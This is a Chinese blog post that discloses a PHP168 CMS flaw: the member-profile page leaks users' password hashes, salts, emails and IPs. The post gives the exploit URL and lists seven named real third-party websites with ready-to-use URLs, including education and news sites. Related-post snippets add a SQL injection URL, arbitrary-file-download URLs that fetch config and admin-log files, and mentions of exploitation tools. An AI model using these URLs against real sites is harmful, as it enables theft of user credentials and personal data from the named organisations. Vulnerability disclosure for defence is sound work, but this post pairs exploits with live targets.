php 168,PHP168一个神奇的漏洞,可查询任意用户数据

最新推荐文章于 2024-05-09 18:45:00 发布
最新推荐文章于 2024-05-09 18:45:00 发布
阅读量1.1k 收藏
点赞数
文章标签: php 168

国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。

PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile

以PHP168官方演示站点为例,查看任意用户信息的页面链接为:

http://php168.cn/com/homepage.php/admin/member-profile

由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。

imgpxy.php?url=gpj.756641515112903102%2F9031_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

测试站点:

该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:

http://www.zjfzol.com.cn/homepage.php/admin/member-profile

http://www.scswl.cn/homepage.php/admin/member-profile

http://www.tunet.edu.cn/homepage.php/admin/member-profile

http://www.itlead.com.cn/homepage.php/admin/member-profile

http://www.aedp.cn/homepage.php/admin/member-profile

http://www.qianlongnews.com/homepage.php/test/member-profile

http://ny.zlxk.com/gov/homepage.php/admin/member-profile

weixin_39914107
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
国内免费(开源)CMS系统大全
爱码农爱生活
01-11 3659
最近在网上搜集了一下国内的CMS程序,包括了类型,脚本,及其特点和评价,希望能对大家有所帮助,由于搜集于网络难免有不足和纰漏之处,还请大家能多多指正!首先还是介绍一下什么是CMS。CMS(Content Management System),中文叫作整站系统、文章系统,大概2004以前,如果想进行网站内容管理,基本上都是靠手工维护,但千变万化的信息流,但没有好的程序支持,还继续靠手工完成是不可能的...
php168 6.02漏洞,PHP168 V6.02整站系统远程执行任意代码漏洞
weixin_30695935的博客
03-11 816
PHP168在某些函数里运用了eval函数,但是某数组没有初试化,导致可以提交任意代码执行.漏洞出在inc/function.inc.php里面.get_html_url()这个函数.function get_html_url(){global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;$id=$aid;if($pa...
php168一个漏洞
qq_15618849的专栏
03-10 1615
这个问题是程序员容易忽略的,往往只是依靠gpc或addslashes函数对用户直接输入的数据进行处理,这样数据中的'"等都会被\转义,这样就能正确的执行sql语句,有效防止注入攻击了。但存入数据库的数据呢?在执行完sql语句存入数据库的是经过gpc处理前的原始数据,那么当程序再select出的就是受污染的数据了,如果把select出的数据再执行sql语句,那么就触发了sqlinj,如果直接写入缓存
php168整站系统官网,PHP168整站系统官方下载
weixin_39897070的博客
03-22 612
php168整站系统是一款专业的建站系统,它的功能十分强大,不论是广告系统的插入还是自定义模型给专题添加文章等等,它都可以轻而易举的搞定。有需要的小伙伴可以来当易网下载!php168整站系统简介php168整站系统下载PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用。PHP168整站系统一直以来受广大...
php168 6.0.1变量覆盖
最新发布
zkaqlaoniao的博客
05-09 1024
这里其实也可以倒过来找漏洞这里是从 eval 找到变量覆盖其实也可以从变量覆盖的地方找到 eval rce两种思路都可以到了最后 exp 的地方我也蒙了也不是很能找到原因网上更是找不到相关的解析找到的都要么直接放exp要么就很乱的代码。
php168v4.0漏洞,PHP168 V4.0 cookie欺骗 EXP
weixin_35958479的博客
03-10 270
漏洞的原理:具体的请看admin/global.php这个文件里面关于用户登陆部分的代码,这里截取一下。。。/*用户登录*/if($_POST[loginname]&&$_POST[loginpwd]){if($webdb[yzImgAdminLogin]){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzi...
php168 shell,php168 v6/v7鸡肋Getshell安全问题
weixin_39949506的博客
03-09 149
刚搜了一下貌似和以前一个漏洞一个问题。有点鸡肋,需要条件:1.网站配置为:文章生成真静态2.允许注册会员给出v6的测试代码,提交后执行phpinfo(),v7原理一样,只是数据库字段数不一样。member/list.php?step=2&type=delete&aiddb[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,...
php168下载任意文件漏洞利用工具
05-22
php168下载任意文件 内部用的。。现在共享上来 拿积分的,点击查看代码后 等上三秒钟 如果有漏洞就可以看到对方的源代码了。。。
商城账户订单页面插件 for PHP168.rar
07-14
作为PHP168的插件,它应该遵循该平台的安全标准,确保用户数据的安全。同时,考虑到PHP168的广泛使用,这个插件应具备良好的兼容性,能够适应不同版本的PHP168系统,并与其他插件协同工作,避免冲突。 6. **自定义...
首页幻灯片新风格插件 for PHP168.rar
07-14
1、代码部分为: [removed][removed] <DIV id=lanren_tuku align="center"></DIV> [removed] txt="$label[hdjsss]" var sohuFlash2 = new sohuFlash...鉴于168默认幻灯功能较弱,现整理1个JS AND FLASH效果如图:
PHP168整站源码 v4.0 SP3
03-26
2.每个广告会有一个独立的全局变量标签{$AD_label['**']}你把他放到网页模板的任意地方,即可调其显示其中的信息,因此你还可以借此做为网站内容的布置 F、强大的字符替换功能 1.你可以批量替换文章中已经存在的不...
php168sql注入漏洞
08-15
php168某版本存在sql注入,可通过该漏洞获取数据库信息
PHP168 0Day 文件代码泄露漏洞利用工具
03-24
PHP168 0Day 文件代码泄露漏洞利用工具
国微CMS学校网站系统(PHP168 S系列) v20180925.zip
07-07
师名录查询系统、招生系统、文章模块、视频模块、图片模块、下载模块、问答系统、表单系统、在线办事系统、广告模块、服务反馈体系、手机群发平台、邮件群 发平台、用户体系、在线招聘平台、留言本等模块。...
php168v4.0漏洞,PHP168 V6.02整站系统远程执行任意代码漏洞
weixin_34451330的博客
03-10 453
if(!$aid&&!$rid){$aid=$id;}if($rid){if(!$aid){showerr("aid不存在!");}$erp=get_id_table($aid);//修改主题或修改多页都可$rsdb=$db->get_one("SELECT R.*,A.* FROM {$pre}article$erp A LEFT JOIN {$pre}reply$erp ...
利用php168任意文件下载漏洞拿权限,任意文件下载漏洞的简单防护措施 互联网技术圈 互联网技术圈...
weixin_42153793的博客
03-22 234
我们在开发Web应用时,经常会提供文件下载的功能。工程师们一般会考虑遵循“单一原则”,会开发一个将请求中的file或filePath作为参数,来下载指定的文件。这样开发一个下载的功能,就能支持所有的下载需求了。比如,输入这样的URL就能够下载123.txt这个文件了。这样的确很方便,但是,大家有没有想过,这样的功能可能会出现什么样的安全隐患或者漏洞呢?来,我们先看看例子:下面是一段提供文件下载的s...
php168 v6.0拿shell漏洞
weixin_30629653的博客
12-16 292
分两步 第一 do/下jsarticle.php文件if(!eregi("^(hot|com|new|lastview|like|pic)$",$type)){die("类型有误");}$FileName=dirname(__FILE__)."/../cache/jsarticle_cache/";if($type=='like'){$FileName.=floor($id/3000)....
PHP168整站系统0DAY漏洞预警
Jim的博客
09-25 2306
下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。 http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" http://dabei.org//job.php?job=download&ur
PHP168 V6.02 整站系统远程执行任意代码漏洞利用
收集盒 Book box
08-13 2474
漏洞出在 inc/function.inc.php 里面 .get_html_url() 这个函数. inc/function.inc.php: function get_html_url(){  global $rsdb,$aid,$fidDB,$webdb,$fid,$
asp、php、jsp、jpg中哪一个不是任意漏洞上传的类型
06-09
其中,jpg不是任意文件上传漏洞的上传文件类型。因为jpg是一种图片文件格式,它的文件内容是被规范化的,不像asp、php、jsp等是可以包含可执行代码的动态脚本文件类型,因此无法通过jpg文件实现任意文件上传漏洞攻击。但是,攻击者可以将任意文件重命名为.jpg格式并上传,然后通过其他漏洞或技巧来执行这些文件,因此服务器仍然需要对上传文件进行严格的限制和过滤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值